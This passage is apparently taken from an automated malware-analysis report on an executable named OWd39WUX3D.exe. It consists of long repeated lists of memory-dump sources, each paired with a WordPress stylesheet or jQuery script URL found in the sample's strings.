00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=c08792de11d2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=c08792de11d2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, 